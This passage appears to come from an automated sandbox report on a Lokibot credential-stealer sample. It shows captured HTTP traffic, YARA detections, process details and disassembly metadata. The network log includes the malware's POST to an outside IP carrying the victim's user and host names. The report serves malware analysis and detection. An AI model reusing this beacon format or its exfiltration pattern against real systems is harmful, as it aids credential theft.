                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers */ background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); /* W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,
                                                Sep 23, 2022 07:58:36.030744076 CEST103INData Raw: 20 20 20 20 30 70 78 20 34 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 70 78 20 35 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 2c 0d 0a 20
                                                Data Ascii: 0px 4px 10px rgba(0,0,0,0.15), 0px 5px 2px rgba(0,0,0,0.1), 0px 6px 30px rgba(0,0,0,0.1);}.jumbotron p { font-size: 28px; font-weight: 100;}.main { background: white; color: #234;
                                                Sep 23, 2022 07:58:36.030761003 CEST104INData Raw: 6d 65 20 22 77 65 62 6d 61 73 74 65 72 22 20 61 6e 64 20 64 69 72 65 63 74 65 64 20 74 6f 20 74 68 65 20 77 65 62 73 69 74 65 27 73 20 64 6f 6d 61 69 6e 20 73 68 6f 75 6c 64 20 72 65 61 63 68 20 74 68 65 20 61 70 70 72 6f 70 72 69 61 74 65 20 70
                                                Data Ascii: me "webmaster" and directed to the website's domain should reach the appropriate person.</p> <p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to "webmaster@example.com".</p> </di
                                                Sep 23, 2022 07:58:36.030777931 CEST106INData Raw: 61 72 65 20 74 68 61 74 20 6d 61 6b 65 73 20 74 68 65 20 77 65 62 73 69 74 65 20 72 75 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 49 66 20 79 6f 75 20 68 61 76 65 20 69 73 73 75
                                                Data Ascii: are that makes the website run.</p> <p>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project. Unless you intended to visit CentOS.org, the CentOS Proj


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.549701162.0.223.1380C:\Users\user\Desktop\PI#53034601506400.exe
                                                TimestampkBytes transferredDirectionData
                                                Sep 23, 2022 07:58:37.371596098 CEST106OUTPOST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 162.0.223.13
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9AC780C0
                                                Content-Length: 165
                                                Connection: close
                                                Sep 23, 2022 07:58:37.549799919 CEST107OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                                                Data Ascii: (ckav.rualfons965543DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                Sep 23, 2022 07:58:38.275764942 CEST108INHTTP/1.1 200 OK
                                                Date: Fri, 23 Sep 2022 05:58:37 GMT
                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                X-Powered-By: PHP/5.4.16
                                                Content-Length: 5017
                                                Connection: close
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers */ background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); /* W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,
                                                Sep 23, 2022 07:58:38.275799990 CEST109INData Raw: 20 20 20 20 30 70 78 20 34 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 70 78 20 35 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 2c 0d 0a 20
                                                Data Ascii: 0px 4px 10px rgba(0,0,0,0.15), 0px 5px 2px rgba(0,0,0,0.1), 0px 6px 30px rgba(0,0,0,0.1);}.jumbotron p { font-size: 28px; font-weight: 100;}.main { background: white; color: #234;
                                                Sep 23, 2022 07:58:38.275816917 CEST111INData Raw: 6d 65 20 22 77 65 62 6d 61 73 74 65 72 22 20 61 6e 64 20 64 69 72 65 63 74 65 64 20 74 6f 20 74 68 65 20 77 65 62 73 69 74 65 27 73 20 64 6f 6d 61 69 6e 20 73 68 6f 75 6c 64 20 72 65 61 63 68 20 74 68 65 20 61 70 70 72 6f 70 72 69 61 74 65 20 70
                                                Data Ascii: me "webmaster" and directed to the website's domain should reach the appropriate person.</p> <p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to "webmaster@example.com".</p> </di
                                                Sep 23, 2022 07:58:38.275834084 CEST112INData Raw: 61 72 65 20 74 68 61 74 20 6d 61 6b 65 73 20 74 68 65 20 77 65 62 73 69 74 65 20 72 75 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 49 66 20 79 6f 75 20 68 61 76 65 20 69 73 73 75
                                                Data Ascii: are that makes the website run.</p> <p>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project. Unless you intended to visit CentOS.org, the CentOS Proj


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:07:58:27
                                                Start date:23/09/2022
                                                Path:C:\Users\user\Desktop\PI#53034601506400.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\PI#53034601506400.exe"
                                                Imagebase:0xa0000
                                                File size:864768 bytes
                                                MD5 hash:05D1649E1B980B3D59B189A2FE07FC3C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Target ID:1
                                                Start time:07:58:37
                                                Start date:23/09/2022
                                                Path:C:\Users\user\Desktop\PI#53034601506400.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\PI#53034601506400.exe
                                                Imagebase:0x820000
                                                File size:864768 bytes
                                                MD5 hash:05D1649E1B980B3D59B189A2FE07FC3C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.322806512.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:12.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:54
                                                  Total number of Limit Nodes:1
                                                  execution_graph 11113 7771f0 11114 777204 11113->11114 11117 77742a 11114->11117 11124 777510 11117->11124 11128 777626 11117->11128 11132 777688 11117->11132 11136 77760c 11117->11136 11140 777500 11117->11140 11125 777554 11124->11125 11126 77764b 11125->11126 11144 777907 11125->11144 11129 777639 11128->11129 11130 77764b 11128->11130 11131 777907 2 API calls 11129->11131 11131->11130 11133 77768e 11132->11133 11157 777bd0 11133->11157 11134 77720d 11137 7775bf 11136->11137 11138 77764b 11137->11138 11139 777907 2 API calls 11137->11139 11139->11138 11141 777554 11140->11141 11142 77764b 11141->11142 11143 777907 2 API calls 11141->11143 11143->11142 11145 777926 11144->11145 11149 777957 11145->11149 11153 777968 11145->11153 11146 777936 11146->11126 11150 7779a2 11149->11150 11151 7779cc RtlEncodePointer 11150->11151 11152 7779f5 11150->11152 11151->11152 11152->11146 11154 7779a2 11153->11154 11155 7779cc RtlEncodePointer 11154->11155 11156 7779f5 11154->11156 11155->11156 11156->11146 11158 777bde 11157->11158 11161 777c09 11158->11161 11159 777bee 11159->11134 11162 777c51 11161->11162 11163 777c77 RtlEncodePointer 11162->11163 11164 777ca0 11162->11164 11163->11164 11164->11159 11165 7740d0 11166 7740e2 11165->11166 11167 7740ee 11166->11167 11169 7741e0 11166->11169 11170 774205 11169->11170 11174 7742e0 11170->11174 11178 7742d0 11170->11178 11175 774307 11174->11175 11176 7743e4 11175->11176 11182 7738a8 11175->11182 11180 774307 11178->11180 11179 7743e4 11180->11179 11181 7738a8 CreateActCtxA 11180->11181 11181->11179 11183 775370 CreateActCtxA 11182->11183 11185 775433 11183->11185

                                                  Executed Functions

                                                  Function 0077CD27 Relevance: 2.6, Strings: 1, Instructions: 1397COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d
                                                  • API String ID: 0-2564639436
                                                  • Opcode ID: 277a37c26ee0bfd354f2f8f1096a2558ccbfb09cdb299de7e4cb7376c4ba8609
                                                  • Instruction ID: 2e325ecf81858370264c7f2bd818c4ab0a71a932228aaaee508102c139ed2b77
                                                  • Opcode Fuzzy Hash: 277a37c26ee0bfd354f2f8f1096a2558ccbfb09cdb299de7e4cb7376c4ba8609
                                                  • Instruction Fuzzy Hash: D8D25D74B40219CFDB28DF64D858AA977B2BF89344F10C8A9D9099B355DB34EC86CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0077E1B8 Relevance: .5, Instructions: 543COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1312ee8fc8e44c5f59742859bc82d7f8760d0afa654fdfc7e5491296560ddfe1
                                                  • Instruction ID: 39ade13386c8299ef6fc1e7cc3f17743e50043c22dda8e349ae0377038910514
                                                  • Opcode Fuzzy Hash: 1312ee8fc8e44c5f59742859bc82d7f8760d0afa654fdfc7e5491296560ddfe1
                                                  • Instruction Fuzzy Hash: AD120235F006558BCF289B74C4546BE77A2AF88384F14C4AAE80E9B391DB3CDD41DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00775364 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 936 775364-775431 CreateActCtxA 938 775433-775439 936->938 939 77543a-775494 936->939 938->939 946 775496-775499 939->946 947 7754a3-7754a7 939->947 946->947 948 7754a9-7754b5 947->948 949 7754b8 947->949 948->949 951 7754b9 949->951 951->951
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00775421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 1d3b705ad5e6d43fafdfbeaae2ffcccd2c14237875a00610ac9c3f95ae6d41ed
                                                  • Instruction ID: 6574bceb4cff0f73cba616b50aa61eb6ae18bc9c2ac9cd7e46b7ea8c17c31e0b
                                                  • Opcode Fuzzy Hash: 1d3b705ad5e6d43fafdfbeaae2ffcccd2c14237875a00610ac9c3f95ae6d41ed
                                                  • Instruction Fuzzy Hash: FC4116B1D0065CCEDB24CFA9C8887DDBBB5BF59304F20806AD409AB351DB79598ACF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007738A8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 952 7738a8-775431 CreateActCtxA 955 775433-775439 952->955 956 77543a-775494 952->956 955->956 963 775496-775499 956->963 964 7754a3-7754a7 956->964 963->964 965 7754a9-7754b5 964->965 966 7754b8 964->966 965->966 968 7754b9 966->968 968->968
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00775421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 6147b455ecfe2d61d64c1126a0436282c500d31a0ffa7128f7fbae5c9946789a
                                                  • Instruction ID: 66a2933f56b5e9b874d0ba1981711f1d4b4536997c25ed7d2b696d8af1dc7d21
                                                  • Opcode Fuzzy Hash: 6147b455ecfe2d61d64c1126a0436282c500d31a0ffa7128f7fbae5c9946789a
                                                  • Instruction Fuzzy Hash: 5A41E5B1D0061CCBDB24DFA9C8887DDBBB5BF59305F208069D409AB351DBB5698ACF90
                                                  Uniqueness

